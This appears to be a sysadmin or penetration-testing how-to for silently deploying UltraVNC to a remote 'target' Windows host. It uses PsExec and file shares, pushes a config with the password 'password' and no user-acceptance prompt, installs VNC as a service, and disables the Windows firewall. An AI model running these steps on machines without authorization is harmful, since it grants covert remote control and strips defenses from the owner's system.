• From a Windows system :
    • Download PSExec : http://technet.microsoft.com/en-us/sysinternals/bb897553
  • From a Linux system :
  • Download UltraVNC :
  • Copy the UltraVNC installation binary to the target Windows system using Windows filesharing
    net use \\targethost\c$ /user:jdoe
    copy UltraVNC_1.0.9.6.1_Setup.exe \\targethost\c$\
    
  • Install UltraVNC with the “/verysilent” argument
    psexec \\targethost -u jdoe -i C:\UltraVNC_1.0.9.6.p.exe /verysilent
    
    PsExec v1.98 - Execute processes remotely
    Copyright (C) 2001-2010 Mark Russinovich
    Sysinternals - www.sysinternals.com
    
    Password:
    
    C:\UltraVNC_1.0.9.6.1_Setup.exe exited on 192.168.0.10 with error 0.
    
  • Create a local configuration file for UltraVNC. This can be done either by installing your own copy and using the config file, or by using this text. The configuarion file is called “ultravnc.ini”
    [Permissions]
    [admin]
    FileTransferEnabled=1
    FTUserImpersonation=1
    BlankMonitorEnabled=1
    BlankInputsOnly=0
    CaptureAlphaBlending=0
    BlackAlphaBlending=0
    DefaultScale=1
    UseDSMPlugin=0
    DSMPlugin=
    DSMPluginConfig=
    primary=1
    secondary=0
    SocketConnect=1
    HTTPConnect=1
    XDMCPConnect=0
    AutoPortSelect=0
    InputsEnabled=1
    LocalInputsDisabled=0
    IdleTimeout=0
    EnableJapInput=0
    QuerySetting=2
    QueryTimeout=10
    QueryAccept=0
    LockSetting=0
    RemoveWallpaper=1
    RemoveEffects=0
    RemoveFontSmoothing=0
    RemoveAero=1
    DebugMode=0
    Avilog=0
    path=C:\Program Files\UltraVNC
    DebugLevel=0
    AllowLoopback=0
    LoopbackOnly=0
    AllowShutdown=1
    AllowProperties=1
    AllowEditClients=1
    FileTransferTimeout=30
    KeepAliveInterval=5
    SocketKeepAliveTimeout=10000
    DisableTrayIcon=0
    MSLogonRequired=0
    NewMSLogon=0
    ConnectPriority=0
    PortNumber=5900
    HTTPPortNumber=5800
    [ultravnc]
    ; both passwords are "password"
    passwd=DBD83CFD727A145800
    passwd2=DBD83CFD727A145800
    
  • Copy the new configuration file to the target Windows machine
    copy ultravnc.ini "\\targethost\c$\Program Files\UltraVNC\"
    
  • Install UltraVNC as a Windows service on the target Windows machine
    psexec \\targethost -u jdoe -i "C:\Program Files\UltraVNC\winvnc.exe" -install
    
    PsExec v1.98 - Execute processes remotely
    Copyright (C) 2001-2010 Mark Russinovich
    Sysinternals - www.sysinternals.com
    
    Password:
    
    C:\Program Files\UltraVNC\winvnc.exe exited on 192.168.0.10 with error code 0.
    
  • If the target Windows machine has it’s Windows firewall enabled and blocking the port, you can disable it
    psexec \\targethost -u jdoe -i netsh firewall set opmode disable
    
  • You should now be able to initiate a VNC connection to the target using the password “password”